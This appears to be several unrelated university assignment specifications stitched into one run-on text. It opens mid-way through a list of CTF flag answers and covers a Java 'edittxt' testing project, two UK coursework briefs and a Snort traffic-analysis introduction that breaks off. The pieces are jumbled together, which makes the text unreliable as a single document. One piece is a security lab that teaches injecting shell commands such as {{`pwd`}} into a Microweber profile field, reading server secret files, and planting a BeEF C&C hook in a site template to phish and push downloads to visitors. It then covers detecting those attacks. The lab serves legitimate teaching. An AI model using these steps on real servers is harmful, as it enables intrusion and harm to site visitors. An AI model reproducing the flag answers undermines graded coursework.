’66c16428e971_33760’, ‘3bb5b70f253c_94519’, ‘428e66c16971_85760′, ’70f23bb5b53c_96119’]”,“flag3”: “JaneDoe_19010101_123456789”,“flag4”: “e96281643cb6661fbc0533e28e64”,“flag5”: “7552619643cb6661fb9b738c0533”,“flag6”: “aa2ba3bb2456f39d51553298e821”,“flag7”: “[‘f2e7aa586cd8’, ‘ed9361f82830’, ‘f2e7aa586cd8’, ‘ed9361f82830’, ‘f2e7aa586cd8’, ‘ed9361f82830’]”,“flag8”: “8e61e428168eeb43cb6661fee962”,“flag9”: “58661e43cb6661fc8eebd8e3ce71”,“flag10”: “a9268eeb2bfead641e3cb6661f59”,“flag11”: “301fa58e8eeba221eec155a0f562”,“flag12”: “[‘679fba439156’, ‘cafa10f622c7’, ‘d5e36dc5a36b’, ‘2d2a0cc88888’]”}The # of elements in the array flags do not coordinate with the submission and is for demonstration only. it is up to you to determine for those flags how many elements to report! TROUBLESHOOTINGAm I on the correct page for the flag I am trying to solve?Menu Links do not load / Website(s) are not loading (The site can’t be reached / We’re having trouble finding that site)Copying and pasting between the Workstation and the Virtual Machine isn’t workingTask A submission failedTasks B-I are not unlocked and say “Task A needs to be completed before this Task is unlocked.”Task A says, “You have reached the maximum # of entries; the VM will need to be restored.”JavaScript files are not showing in the Web Developer ToolsThe VM is bricked (no longer functioning)Gradescope won’t allow more submissions (16 submissions limit)Example Error pageThe above error page shows upIf the above steps did not resolve the errorIf the above steps still did not resolve the error, try these stepsFinally, if the above steps still did not resolve the error, try these steps
This part of the document is provided to help you track where you are in the individual project. This section will be updated in future deliverables.ProvidedExpectedProvidedExpectedProvidedExpectedProvided: TBDExpected: TBDIn this deliverable, you will provide your own implementation of the edittxt utility, written on the Main.java file. Your implementation must pass all of the test cases that you submitted as part of Deliverable 2 (D2). In addition, we will assume that someone else in your team developed a set of additional test cases, independently from you. Your code will also have to pass these additional tests.Please note that these tests all pass on the reference implementation we provided for D2, so they should be “compatible” with your own tests (as long as they passed in D2). Similar to D2, we are expecting the test class MyMainTest to be self-contained; that is, MyMainTest should not rely on any external classes or resources. However, you may use different classes or files to implement the edittxt utility. Make sure not to make calls to System.exit() within your tests, as that creates problems for JUnit. For this deliverable, you should not modify or delete any of your passing D2 tests, but you may append additional tests to MyMainTest and modify or delete tests that did not pass in D2. Even if you later realize that your original passing D2 tests are inadequate or somehow do not test the intended program behavior, do not modify the original passing tests as it will result in a penalty. Instead, append improved tests to MyMainTest.Your grade for this deliverable will consist of two parts:Following are the steps to commit and submit this deliverable:javac -cp lib/* -d classes src/edu/gatech/seclass/edittxt/*.java test/edu/gatech/seclass/edittxt/*.java[1]java -cp classes:lib/* org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.edittxt.MyMainTest[2] As soon as you submit, Gradescope will grade your submission by: If any of the above steps fails, you will see a grade of 0 and an error message with some diagnostic information. Please note that, as before, if your submission does not pass the Gradescope checks, it will receive a 0. Conversely, if Gradescope can successfully compile and run your code and both sets of tests, you will immediately receive a grade that is your actual grade for this deliverable (assuming you did not modify your D2 tests). Note that you can resubmit as many times as you want before the deadline.Unlike other assignments, this deliverable is not available to submit on Gradescope until the previous deliverable is due. That is, deliverable 3 will be available on Gradescope 48 hours after this assignment is released on Canvas.The test results that you see in Gradescope tell you whether a given test passed or not. If the test didn’t pass, Gradescope should show the difference between expected and actual outputs. For ease of readability, Gradescope will output newlines as “↵”, tabs as “⇥”, and a single space as ” “. Note that these values are not explicit and not expected as output of the edittxt program; instead, they are replaced to make the Gradescope output easier to read. For example, if the expected output of a test is“Hello,tworld ” + System.lineSeparator()then Gradescope will show a message like… expected but was …If you need clarifications on a specific test or Gradescope output, please post privately on Ed Discussion (if appropriate, we will make it public) and make sure to add, when applicable:The bottom line is that, to make the interaction efficient, you should make your posts as self-contained and easy-to-check as possible. The faster we can respond to the posts, the more students we can help. Although we tested the autograder, it may still handle some corner cases incorrectly. If you receive feedback that seems to be incorrect, please contact us on Ed Discussion using the approach we describe above.In addition, if you think you have a legitimate reason to modify your D2 tests, reach out to us privately on Ed Discussion and provide all the necessary details, to include a justification for why specific tests passed the reference implementation, but failed in your implementation. We believe this should not be necessary, but we cannot completely exclude some rare corner cases.Answer: No, you can only delete or modify tests that did not pass in deliverable 2.Answer: It is recommended you use git-diff or the github interface to compare commits with the commits from your D2 active submission and D3 active submission. This will let you know which statements, if any, were changed.Answer: Unfortunately, we cannot give any further guidance from what was given in the assignment instructions above and/or feedback given from the Gradescope autograder.Answer: Yes, although there are some details to be aware of (1) make sure the autograder runs without problems, (2) ensure that the libraries must not be made specifically for any version of the assignment in the past or present, and (3) you are responsible for behavior of the library, and we will not help debug problems if you run into Gradescope issues using third party dependencies. We would like to caution that using such libraries may cause problems (such as the program exiting abruptly, etc.), and students should be extra careful and aware of what these libraries do.Answer: Yes, this shouldn’t result in an error and does not change any behavior. This will keep the lines containing the given substring “-i”. This happens because we parse first, so “-i” becomes the parameter for “-k”, just like any other string. Answer: We cannot reveal any of the scenarios tested against.[1] On some platforms, you may need to first create directory “classes”.[2] If using a Windows-based system, you may need to run java -cp “classes;lib/*” org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.edittxt.MyMainTest
Table of contentsDisclaimersObjectives Checklist of Downloaded Project FilesTasksRole 1 Attacker 45%Task 1.1 Exploit Discovery 15%Task 1.2 Compromise 30%Role 2 Forensics Investigator 55%Task 2.1 Auditor Tool Development 25%Task 2.2 Attack Investigation 30% SubmissionWe are always looking to improve our homework assignments. If you see any errors, whether they are grammatical or technical, please report them on Ed Discussion. If anything is not clearly stated, please contact the TAs.With this project, you will be able to understand the big picture of how common web attacks can happen in the real world by playing two roles typically involved in the attack: Attacker👿Understand the concept of code injection and its potential impact on a web server.Be able to compromise a web server by exploiting a code injection vulnerability and inserting attack payloads into websites.Be familiarized with the use of browser exploitation framework beef.Understand how common web attacks (e.g., phishing, drive-by download, page redirection) work. Forensic Investigator🕵🏼♀️Understand and be able to develop auditing tools for Chrome browser through Chrome DevTools Protocol to log browser activities.Be able to construct causality graphs through neo4j based on logs collected.Be able to write neo4j queries to identify attacks based on their patterns in the causality graph. auditor The code template you will work on. assignment_questionnaire.txt The questionnaire where you put your answers.Role 1 – Attacker (45%)During reconnaissance, you found the following information.Your opponent Bob hosts his websites on a cloud server.The service provider runs all the customersʼ services on the same server with no isolation (which is a bad practice!!!.Another web service running by the service provider, named Microweber, has a known code injection vulnerability.With these insights, you made a smart plan to mess with Bob and his clients.Purchase a membership from the service provider to use the Microweber service, disguising yourself as a legitimate customer.Exploit the known code injection vulnerability to take control of the server.Insert malicious scripts into HTML files of Bobʼs websites stealthily to mess up with Bobʼs clients.In this way, from the affected clientsʼ point of view, the attacks are from Bobʼs website. As a result, Bobʼs reputation gets undermined, and he loses clients as time goes by.Without further due. Letʼs get started!After you have got the membership, you are permitted to register as an admin to further use the Microweber service. Open the project page: https://cs6264.gtisc.gatech.edu/ Log in with your GT account from the top right corner. Click on the start button and you will see two docker containers started for you.Note: if later you accidentally crash the services (likely to happen when you test out your code injection w/ illegal payload), you can always come back to this page, stop and start the services again to get a fresh environment. Enter the Microweber, scroll all the way down, register a Microweber admin account (any credential is fine), and hit Install. It will take a little time for the installation to complete. Once installation is done, you will see your admin console page. Now itʼs time to exploit!Background It is common for websites to take user inputs, store them in the database, and use them later. A simple example is an online service that:a Takes your username during registrationb Stores the username you submitted in the database. c Retrieves the username from the database to display it on your profile page when you log in.What happens under the hood is that when you log in after registration, before the server delivers your profile page, it first constructs your profile page by dynamically filling the value of the username field in a profile page template with your username retrieved from the database. The process of server-side webpage construction allows code included in a webpage to be dynamically executed on the server, to dynamically get the data needed to complement the webpage. For example, a snippet of a code may query APIs to get the current server status and put it into a webpage to be delivered together with other information to users. Specifically, any content in the format {{…}} will be treated as a code snippet and executed. For example, {{`pwd`}} embedded in a webpage will be parsed as `pwd` and further executed as pwd command in the serverʼs shell to list all the files in the current directory during the construction of that page. Hint: Any characters between two backticks ` , will be treated as a shell command on Linux. Location of backtick on the keyboard.Combined with those two features, can we do something nasty? The answer is YES! As you probably have figured out, you can set your username as {{`malicious code does something nasty`}} so that your “usernameˮ will be parsed and executed as code and do nasty stuff during the profile page construction on the server. A common practice to prevent this type of attack is to sanitize user inputs by turning them into inexecutable strings. However, sanitizations are not always correctly implemented. The Microweber website is an example — one of the user input fields lacks proper sanitization and is vulnerable to code injection attacks.Steps: After installation, you will see your profile page. To help you narrow down the search space, we give you a hint that the injection point is somewhere in the profile information. Go to Users and click on Edit profile. Then go back or refresh the Users page and see if you observe anything interesting. If you see the output oflast step (which only show partial result). Note 2 Make sure the Users page is reloaded after you save your exploit input. The injected command will not get executed until the Users page is reloaded. Now modify your injected command to get your hash stored in /tmp/secret_1.txt on the server, see the example below. Submit this hash string to Q1.1 in the questionnaire. Note: If you see two identical hashes, just submit one. This may happen due to that the injected data field is accessed twice during page construction.)RubricDescriptionThe ability to run a command on the web server implies that you may do more on the web server, including modifying Bobʼs website. In this task, your goal is to insert a malicious script payload into a template HTML file used by Bobʼs website. Webpages Bobʼs website imports the infected template, hence being infected as well. In this way, Bobʼs clients get compromised when visiting his webpages.Steps Locate the directory of Bobʼs website and assets directory of clients.Clientsʼ directories are normally organized together under the same parent folder, just like /home in Linux. To help protect the clientʼs privacy, the service provider names a customerʼs assets directory with the MD5 hash of the clientʼs name (e.g., MD5ˮBobˮ). Be careful about the letter cases.) instead of the clientʼs actual name (i.e., Bob). Your goal is to locate the client assets directory (parent directory of Bobʼs directory) and submit it to Q1.2.1 in the questionnaire. Note: you should submit the exact directory name, NOT the directory path (see the example below). Any additional characters (e.g., / ) in your submission will cause a mismatch and lead to 0 pts during autograding.Hints:Many online MD5 generators are available.You can use the Linux find command to search for Bobʼs directory. You can use / (root location) or .. (parent folder) as the search location to help you.In the example below, your answer submitted to Q1.2.1 should be clients_assets .$ find / -iname client_md5Result: /xx/xx/clients_assets/client_md5 Find the best template file to insert the malicious script payload.Most modern websites follow a certain organized structure — frequently used resources are put into templates for efficient reuse. For example, the same navigation bar may be used repeatedly throughout many pages of a website. Therefore, a website admin can save the navigation bar as a template innavigation.html and have those pages that need to display the navigation bar import navigation.html . From theattackerʼs perspective, finding and modifying such a template is optimum as this modification is minimal yet impactful. Your goal is to figure out which template HTML under the templates directory in Bobʼs website directory makes the most sense to insert the malicious script payload into. Submit your answer (in the format of xxx.html ) to Q1.2.2 in the questionnaire. Note: make sure your spelling is correct. Incorrect file name by any means leads to 0 pts for this task.Hints:Think about what type of data you are trying to insert into the website.The correct template file has a hint at the beginning of the content indicating you have found the correct one.You donʼt need to check files in the sub-directories. All you need to do is examine the HTML files right under the templates directory. Insert the malicious script into the target.Once you have found the best template file, the next step is to insert the malicious payload. A smart practice attackers typically follow is that instead of deploying a one-time attack, they install a remote hook on the victimʼs page/machine that can connect to an attacker-owned Control and Command C&C server. When the remote hook gets triggered (the infected webpage is open), it constantly emits heartbeats to the C&C server to notify the attacker a zombie is online. Then the attacker can freely issue any preconfigured attack commands to the zombie.In this project:We use BeEF as the C&C console, which you can find on the project page. The username and password are both: beef_for_cs6264Hints: The src property in the tag has to be present at a minimum to make it work. The dynamically allocated port number may change each time you start a new container. Make sure you use the up-to-date port number.Your goal is to insert the remote hook above through code injection techniques into the template file you found. In this way, Bobʼs webpage gets infected when importing the infected template file. Hint: “ˮ in user inputs are commonly sanitized by the server (try it out and see what happens!, which means you probably cannot include them in your command. You can use any solution as long as it does the work Find and replace? Download from network? Or more?. You are encouraged to look up online resources and learn along the way of trying various possible solutions.To verify If your attack is successful, visit Bobʼs webpage like a normal client. When a user opens an infected webpage, the IP of the connected victim (which is you in this test) will appear in BeEFʼs console. Issue an attackSelect the victim (you) under the Online Browsers , then issue Commands → Social Engineering → Google Phishing attack and observe what happens to Bobʼs webpage.If the attack succeeds, you will see that the original page turns into a phishing page with a hash string at the bottom. Submit this hash to Q1.2.4 in the questionnaire.RubricRole 2 – Forensics Investigator (55%)Congratulations! At this point, you have successfully deployed and tested the attack. Now itʼs time to look at this story from the point of view of another crucial role — the forensics investigator. As a forensics investigator, your job is to find the evidence of any attacks that happened to a victim. To approach this goal, you come up with the following plan: Develop an auditing tool to log browser activities which may include the evidence of attacks. Construct a causality graph by connecting discrete information pieces from the raw logs. Find evidence of attacks in the causality graph based on patterns of attacks.DescriptionIn the first step, you need to develop a handy tool to log and model the activities happening in the browser. To help take away the engineering burden from you, we have helped you implement most of the auditing tool (however, you are encouraged to go through all the code), so that you can focus more on learning the concepts and philosophy of modeling browser activities we provide in the supplementary document.Steps: Read the supplementary document to understand what major activities happening in the browser and the rationale regarding how to model them. Important note: We recommend reading the supplementary from the start to the end. Doing this not only helps you make the best of this project even though only part of it is needed to complete the task we give you. With the knowledge you gained from step 1, complete the function handle_download_begin() in event_handler.py . For testing, you can trigger the download event by visiting a page with download functionality and downloading a file. For example, you can download code from any GitHub repo https://github.com/fate0/pychrome/tree/master. Or you can use the Fake Notification attack involving file downloading from BeEF described in Task 2.2.You need a Linux system with GUI support It is highly recommended to use Ubuntu)Make sure you have Python3 and Chrome installed. Python 3.11 or earlier versions are recommended. Some dependencies may be deprecated in later versions)Install required packages: pip3 install –upgrade && pip3 install -r requirements.txtRun Chrome with auditor listening on the events: python3 auditor.py . Make sure you do not have a running Chrome instance when running the auditor. To save the hassle of repetitively copying and pasting the URL to Bobʼs page to the browser GUI during testing for you, we provide a flag –init-page which automatically opens the URL you specify when the browser starts. The usage is python3 auditor.py –init-pageURL_TO_BOB’s_PAGEThen the auditor starts logging the events. If you see a series of 3 events: 1 request, 2 response, and 3 script parsed repetitively shows up, it is the heartbeat sent back and forth between the remote hook and the BeEF C&C server.Use Ctrl-C in the command line to both stop the browser and output the logs for you. Note: donʼt close the browser from the GUI. Self-test:At runtime: You can check if nodes and edges are properly constructed through self.log_node() and self.log_edge() which print the corresponding information for you.After running: You can check if two new types of log files FileNode.tsv and Frame_download_File_Edge.tsv that log download behavior are generated.Submit your completed event_handler.py to Gradescope. Generate logs for Bobʼs clean (i.e., with no BeEF hook) webpage where no attack/modification is present with your auditor. To do so, stop and start the dockers on the project page (to get a fresh and clean Bobʼs webpage). Compress the generated logs to tar.gz file with the name GT username]_cs6264_lab.tar.gz and submit it to Gradescope along with the questionnaire. Note: submission in the wrong format will lead to 0 pts.Hint: you can use the command tar -czvf [your_username]_cs6264_lab.tar.gz C [your_log_directory] .You can confirm the content of your compressed file by the following.Having additional logs files is fine (which may be generated by your browser extensions if you have any) as long as the submitted logs contain those from Bobʼs page.RubricDescriptionCongratulations! You have completed the key component of this project. Now that you can collect the logs, whatʼs left is to connect those information pieces in the log together to recover the whole picture of what happened during compromised browsing sessions, and find the evidence of attacks in the constructed causality graph. In this task, you need to execute and record logs for three common types of attacks: phishing, fake notification, and browser redirection from BeEFIn such an attack, the malicious script typically resets the content of the webpage to a phishing page (e.g., Legit-looking Gmail logging page) by setting the innerHTML variable. When users fill out their credentials and hit the login button, a copy of the credentials is sent to attackers during redirection to the official login service.the webpage to trick users into performing sensitive operations. For example, a fake notification says that the browser is out of date and needs to be updated to continue, or a plugin needs to be installed to proceed. In this way, users are lured into installing malware. The default URL given by BeEF may not be work, hence no download event occurs in the browser. You can set the file URL to any valid one such as https://github.com/fate0/pychrome/archive/refs/heads/master.zip, and play with fake notification text to see how things change on the victimʼs side.This is a seemingly less harmful attack as it works by merely creating an overlay frame displaying another website on top of the opened frame. However, the flexibility enables the attacks to be more diverse. For example, the new webpage could be any of the following and more:a phishing page to steal credentials (similar to attack 1 a fraud page with fraudulent ads or affiliate links to generate revenue for the attacker a malicious site to initiate actions on behalf of the users who are authenticated (through session cookies), without their knowledge or consent.a page with inappropriate content for targeted reputation damage a page that automatically downloads malware upon openingOnce you have collected logs containing those attacks, your next step is to construct a causality graph, and then find the evidence of those attacks in the graph through queries.Note: These three attacks do not have side effects on your browser. To complete this project, we recommend only playing with these 3 attacks. Other attacks could have an impact on your browser.StepsFor each attack: Log collection: After the auditor runs, open Bobʼs webpage, execute the attack, and generate the logs. Causality graph construction: Load the logs into Neo4j to construct the causality graph. Please see the Supplementary Document for the detailed guide. Query construction: Think about what pattern in the graph can identify a potential Google Phishing attack. Construct a Neo4j query through Cypher Neo4jʼs query language) to locate this pattern in the graph. Please see the Supplementary Document for the detailed guide.a Google Phishing: A phishing page must load the corresponding resources to display the fake content. In this case, is it normal that a Gmail-related resource gets loaded when the user is visiting the product page of a shopping site? See if you can find a Gmail icon requested in the logs. Based on this logoʼs URL, construct a query that returns a Frame – request Resource subgraph where the resource nodeʼs URL points to the Gmail favicon in the causality graph, as shown. Submit your query to Q2.2.1 in the questionnaire. Note that:i The edge should be returned with the two nodes as well, i.e., the subgraph your query returns should contain two nodes and one edge.ii Make sure to use Frame, request, and Resource to name your nodes and edge. Otherwise, you may get 0 pts.Example query response indicating potential Google Phishing attack.b Fake Notification: What is the ultimate goal of this attack? Malware spreading! When you look at the logs, how normal do you think it is for a downloading event to happen when the user is visiting the product page of a shopping site? In this context, the downloading event itself should be suspicious enough. The query you construct should generally return any Frame – download File subgraphs in the causality graph. Submit your query to Q2.2.2 in the questionnaire.Example query response indicating potential malware downloading.c Site Redirection: In this attack, the malicious script creates a new frame displaying the new webpage to cover the existing webpage. Think about this — in a benign webpage design, how often do we need to create a frame through scripts? Script — create Frame pattern in the graph should raise an alert, which should be captured by your query. In addition, heuristics are commonly used to detect malicious URLs. In this task, as a proof of concept, we assume a simple heuristic that the URL of the redirected new page is the top domain URL (e.g., www.example.com ) as opposed to (e.g., www.example.com/xxx/xxx/ ). Following this assumption, you can create a simple heuristic check — the frame nodesʼ security_origin is the same as its url except that the security_origin does not have the / in the end (see the example figure). To perform string operations, you can find help from string functions and scalar functions in Cypher. As shown in the example below, your query should return the pattern Script — create Frame where the frame nodesʼ security_origin is the same as its url except the last / character. Submit your query to Q2.2.3 in the questionnaire.Example query response indicating potential site redirection.Note: Please submit each of your queries in ONE line. Queries submitted in multiple lines lead to 0 pts during auto-grading, make sure to double-check your answer. Please follow the same naming style for nodes and edges as the write-up (e.g., Script, create, Frame . Be sure that the first letter of the node name is uppercase and the edge name is all lowercase. Failing to follow the naming convention will result in 0 pts since other keywords will not be accepted by the autograder. Each of your queries should return a subgraph that contains related nodes and edges as shown in the examples. Incomplete subgraphs returned by your queries will result in 0 pts. Your queries being able to reproduce the sub-graphs shown in the examples indicates that you most likely have done the task right. However, except for the phishing attack which looks for a specific favicon as attack evidence — instead of looking for a specific resource in the lab tests (e.g., the exact filename, the exact redirected pageʼs URL, your other two queries must be generalizable, meaning that they should catch attacks in the real world demonstrating the same behavior patterns (e.g., downloading real malware, redirection to URLs other than the example one). Failing to do so will result in 0 pts if your last two queries are not general.RubricRubricDeliverables assignment_questionnaire.txt event_handler.py GT username]_cs6264_lab.tar.gz containing .tsv logs of Bobʼs clean page.Important Note: Make sure you use the provided questionnaire and the specified formats to submit your answers. Failing to do so can make your ENTIRE project 0 pts since auto-grader cannot take in submissions in other formats. The GT Login ID you fill in the questionnaire must be all lowercase (see the given example. This is NOT your student card #). Failing to do so will make your hash-related tasks 0 pts since the grading depends on your Login ID. All deliverables should only be submitted to Gradescope. Submissions to Canvas will NOT be accepted and graded. Make sure you have followed all the guidelines stated in the write-up as well as the supplementary document. Any point deductions caused by failing to follow the guidelines will NOT be adjusted.
Coursework Submission Requirements: – An electronic copy of the coursework should be uploaded by midnight on the deadline date – Submit both Part 1 and Part 2 as a single PDF file – Submit Part 3 as a single C# source code file (.cs) – The last uploaded version will be the one that is marked – The limit of the file size is 100 MB – The submitted documents should be virus-free, not protected by a password or corrupted – The coursework grade and feedback will be available on Moodle – The coursework cannot be submitted via email – A paper copy cannot be submitted for this coursework Use of AI In case AI-generated content is included in the coursework, it needs to be enclosed in quotation marks and properly referenced. This applies to both text and source code. Otherwise, if detected, it may be considered plagiarism. The University website has details of the current Coursework Regulations, including details of penalties for late submission, procedures for Extenuating Circumstances, and penalties for Assessment Offences. See https://www.gre.ac.uk/student-services/regulations-and-policies for details. Coursework Specification: An education centre is moving from paper-based book-keeping to a desktop information system. The desktop information system is expected to process information about the following groups of users:The system is expected to process the following data about each user from all groups:The system is expected to process the following group specific data:Teaching Staff:Administration:Students:The system is expected to provide the following functionality: Task 1 Based on the provided outline, provide a description of the Desktop Information System, which the education centre is planning to use. This description expresses the user’s point of view about the functionality of the system, the data it is expected to process and the required platforms, including operating system (Microsoft Windows) and hardware. Maximum word count for the system description is 300 words. Based on the provided description, write a software requirements specification of maximum 500 words for the Desktop Information System. The software requirements specification is expected to have the following content:– Purpose– Project scope– Product– Users– Operational Environment– Description– Functional Requirements– Performance– Security– Safety Maximum word count for the software requirements specification is 400 words. For more information about writing software requirements specification, refer to: Wiegers, Beatty, “Software Requirements”, Third Edition, Microsoft: Chapter 10 Documenting the Requirements, page 181 Chapter 11 Writing Excellent Requirements, page 203 Task 2 Provide the following UML diagrams, which represent the design of the Desktop Information System:– Class Diagram– Use Case Diagram For more information about UML, refer to Patrick Grassle “UML 2.0 in Action”. Task 3 Develop the Desktop Information System, as a C# Console Application with data stored in appropriate data structures. Implement a base class named “Person”. By utilising the principles of encapsulation, inheritance and polymorphism, implement the classes “Teacher”, “Admin” and “Student” as derived classes from the base class “Person”. The derived classes are expected to handle the data and the functionality for the respective groups of users. Store the objects into appropriate data structures. The data structures are expected to be able to store unknown number of objects. The Desktop Information System is expected to provide a text-based menu, which provides access to each of the aforementioned functionalities of adding, viewing, viewing by role, editing and deleting records. Add comments describing the functionality of the project. The comments are expected to be approximately 30% of the source code. Organised the project into a single C# source code file (*.cs), which needs to be submitted on Moodle. Grading criteria 70-100% All requirements completed to an excellent standard. 60-69% All requirements completed. However, there are a number of minor deficiencies in significant areas. 50-59% All requirements completed. However, significant improvements could be made in many areas. 40-49% All requirements completed. However, significant improvements could be made in all areas. 30-39% All requirements attempted but the overall level of understanding and performance is poor. 0-29% There are requirements missing or completed to a very inadequate standard, which indicates a very poor or non-existent level of understanding. Grading Components
Detailed Specification – This is an individual piece of workFor this coursework, you are to design a User Interface that would demonstrate understanding and application of all considerations discussed throughout the User Interface Design lectures and tutorials, as per below: DeliverablesThis report should be around 2500 words, it should be presented in a professional structure and it should be underpinned by credible references in the Harvard style. The report should include: Submit your prototype AND your report as a pdf (two separate files). You need to submit the original file. Assessment CriteriaFor further details on assessment criteria, please see the Marking rubric below.
In this project, you will be developing a Java application, edittxt, using an agile, test-driven development process across multiple deliverables. For this assignment you will use version 17 of the Java Development Kit. You will receive one grade for the entire project, but each deliverable must be completed by its own due date and all deliverables will contribute to the overall project grade.edittxt is a command-line utility written in Java with the following specification:edittxt allows for simple text manipulation of the contents of a file.edittxt [OPTIONS] FILEThe program edittxt performs basic text transformation on the lines of text from an input file. It is invoked as a command-line tool using the syntax described above, after compilation. The program writes the transformed text to the standard output and errors or usage messages to the standard error without modifying the input file. The FILE parameter is required and must be the last parameter as shown above. The only options allowed in the program, which are optional, delimited by the left [ and right ] brackets, may be provided in any order and are described as follows:The last command-line parameter provided is always treated as the filename, as shown in the syntax section, while OPTIONS flags can appear in any order and parsed as they appear from left to right. This means that the following two commands are equivalent when executed on the command line:In the above examples, (Example 1) parses -d first, then -k, and finally input.txt while (Example 2) parses -k first, then -d, and finally input.txt. These two examples will result in the same output (assuming that the same input.txt is used for both) because the parsing of options is independent of their execution order. The order of execution for each option is given in the diagram below (note that the colors and border lines are there for ease of viewing):The above diagram of the execution order of options can also be described as follows:Usage: edittxt [-i |-k substring | -s suffix |-p ch num | -d factor | -r target] FILEThe cases below show scenarios where edittxt shall result in an error according to a specific option. The examples described here can also be seen in JUnit 5 form on the MainTest.java file provided to you in the below sections. In the following, “↵” represents a newline character. This part of the document is provided to help you track where you are in the individual project. This section will be updated in future deliverables.ProvidedExpectedProvided: TBDExpected: TBDProvided: TBDExpected: TBDProvided: TBDExpected: TBDDeliverable 1 is split up in two parts: Part I and Part II. Follow the instructions for each of the parts as described below.Your task for this deliverable is to generate 50 to 90 (inclusive) test frames for the edittxt utility using the category-partition method presented in lesson P4L2. Make sure to watch the lesson and demo before getting started.When defining your test specifications, your goal is to suitably cover the domain of the application under test, including relevant erroneous input and input combinations. For example, if you were testing a calculator, you may want to cover the case of division by zero.Do not manually generate combinations of inputs as single choices. Instead, use multiple categories and choices with necessary constraints for the tool to generate meaningful combinations. Using the calculator example, you should not offer choices “add”, “multiple”, and also “add and multiply” in a single category – an example of what not to do can be found in calculator-manual-combinations.txt. In particular, make sure to use constraints (error and single), selector expressions (if), and properties appropriately, rather than eliminating choices, to keep the number of test cases within the 50 to 90 inclusive range.The domain for this assignment is the Java application, so anything that the shell would reject, such as unmatched double quotes, will not reach the application. This means that you must test for invalid input arguments (such as Example 3 above), but you don’t need to test for errors involving parsing the command-line arguments before they’re sent to the Java application. In addition, you may assume that main will be called with a valid args array, meaning that values like null will not be passed.You will use the TSLCompiler tool to generate test frames starting from a TSL file, similar to what we did in the demo for lesson P4L2. Versions of the TSLCompiler for Linux, Mac OS, and Windows, together with a user manual, are available at:We are also providing the TSL file for the example used in the lesson, cp-example.txt, for reference, as well as an example for explaining values, tsl-na-example.md.Since the TSLCompiler is a command-line tool, it must be run from the command line, as we do in the video demo, rather than by clicking on them. The recommended syntax for running the tool is./tslcompiler [ -o output_file ] input_filewhere input_file is the input file to the TSL program, i.e., the catpart.txt file, and output_file is an optional name for the name of the output file, i.e., catpart.txt.tsl. To learn more about the tool, please consult the manual referenced above.If you encounter issues while using the tool, please post a public question on Ed Discussion. For reference, Gradescope will execute the tool on a Linux platform. In this second part of the deliverable, you will create actual test cases implementing the test specifications you created in Part I. As discussed in the lesson on the category-partition method, each test frame is a test specification that can be instantiated as an individual concrete test case. To do so, you should perform the following tests:This is a skeleton of the Main class of the edittxt utility, which we provide so that the test cases for edittxt can be compiled. It contains an empty main method and a method usage, which prints, on standard error, a usage message that should be called when the program is invoked incorrectly. In case you wonder, this method is provided for consistency in test results.This is a test class with a few test cases for the edittxt utility that you can use as an example; it corresponds to the examples of usage of edittxt that we provided. In addition to providing this initial set of tests, class MainTest also provides some utility extensions and methods that you can leverage/adapt and that may help you implement your own test cases. We encourage you to use the methods to ease your design process.This is an empty test class in which you will add your test cases, provided for your convenience.This is a JUnit 5 extension class to facilitate capturing the standard output and standard error, which are needed to test the edittxt application. It is used on the MainTest.java file for reference and provides two methods to capture output from Main.JUnit 5 library to be used for the assignment.// Frame #: Your test frames should contain enough information to create relevant test cases. If you cannot implement your test frames as useful JUnit tests (e.g., because the test frames do not provide enough information), you should revisit Part I. Extending the calculator example, if your test frame specified a numerical input, and you realized that you should use both negative and positive numbers in your JUnit test case, you should revise your categories and choices so that this is reflected in your test frames.If you are uncertain what the result should be for a test, you may make a reasonable assumption on what to use for your test oracle. While you should include a test oracle, we will not grade the accuracy of the test oracle itself. Feel free to reuse and adapt, when creating your test cases, some of the code we provided in the MainTest class. MainTest is provided for your convenience and to help you get started. Whether you leverage the MainTest class or not, your test cases should assume (just like the test cases in MainTest do) that the edittxt utility will be executed from the command line, as follows:java -cp edu.gatech.seclass.edittxt.Main For this deliverable, do not implement the edittxt utility, but only the test cases for it. This means that most, if not all of your test cases will fail, which is expected and fine. javac -cp lib/* -d classes src/edu/gatech/seclass/edittxt/*.java test/edu/gatech/seclass/edittxt/*.javajava -cp classes:lib/* org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.edittxt.MyMainTest[2]submission.txt As soon as you submit, Gradescope will verify your submission by making sure that your files are present and in the correct location, as well as a few additional minor checks.[3] If you pass all of these checks, you will see a placeholder grade of 10 and a positive message from Gradescope. Otherwise, you will see a grade of 0 and an error message with some diagnostic information. Please note that:If you need clarification or have questions regarding Gradescope output, please post privately on Ed Discussion (we will make it public if appropriate) and make sure to add a link to the Gradescope results and any information that may be relevant.The bottom line is that, to make the interaction efficient, you should make your posts as self-contained and easy-to-check as possible. The faster we can respond to the posts, the more students we can help. Answer: In fairness to everyone, we cannot discuss future deliverables. You will have to wait to find out the details of deliverable 2 when it’s released.Answer: No, for part 2 you can only use the test frames that were generated in part 1.Answer: Yes, the file is also an input to the program, so it should be considered when testing.Answer: Although there are no restrictions on your test suite design, testing the limits of data types and file sizes is out of the scope for this assignment.Answer: Yes, that’s no problem. This is expected since the main method is empty, so most tests won’t pass.Answer: Yes, you may (and are encouraged to) use the example test cases to devise your own, in addition to using the structure and test methods provided.[1] On some platforms, you may need to first create directory “classes”.[2] If using a Windows-based system, you may need to run java -cp “classes;lib/*” org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.edittxt.MyMainTest instead.[3] Although we tested the checker, it is possible that it might not handle correctly some corner cases. If you receive feedback that seems to be incorrect, please contact us on Ed Discussion.
This project introduces you to practical techniques for distinguishing between legitimate and malicious network traffic. Network operators frequently perform this task to ensure network security and detect potential threats.In this project, you will analyze a pcap file (evaluation.pcap) that contains network traffic from multiple hosts. This file includes a mix of legitimate and malicious traffic. Your task is to investigate the traffic patterns using Wireshark and then create Snort rules to automatically differentiate between benign and malicious activity.By completing this project, you will gain hands-on experience with:Through this process, you will develop a deeper understanding of network security monitoring, intrusion detection systems (IDS), and the fundamentals of network forensics.If you’re already familiar with the tools, you can skip to and focus on the following sections:However, reading through the full document will give you a better understanding of what you’ll be working on. Before you post any questions on Ed, please read this document thoroughly.This assignment includes four distinct attack scenarios. Each scenario is based on a predefined network topology, where the attack originates from one or more machines outside the target network.The network is a standard LAN topology hosted on the AWS computing platform. All hosts are behind NAT, and their IP addresses fall within the 172.31.0.0/16 subnet. The figure below provides a visual representation of the network setup and how traffic is collected.Figure 1: Network setup for traffic collection. In a 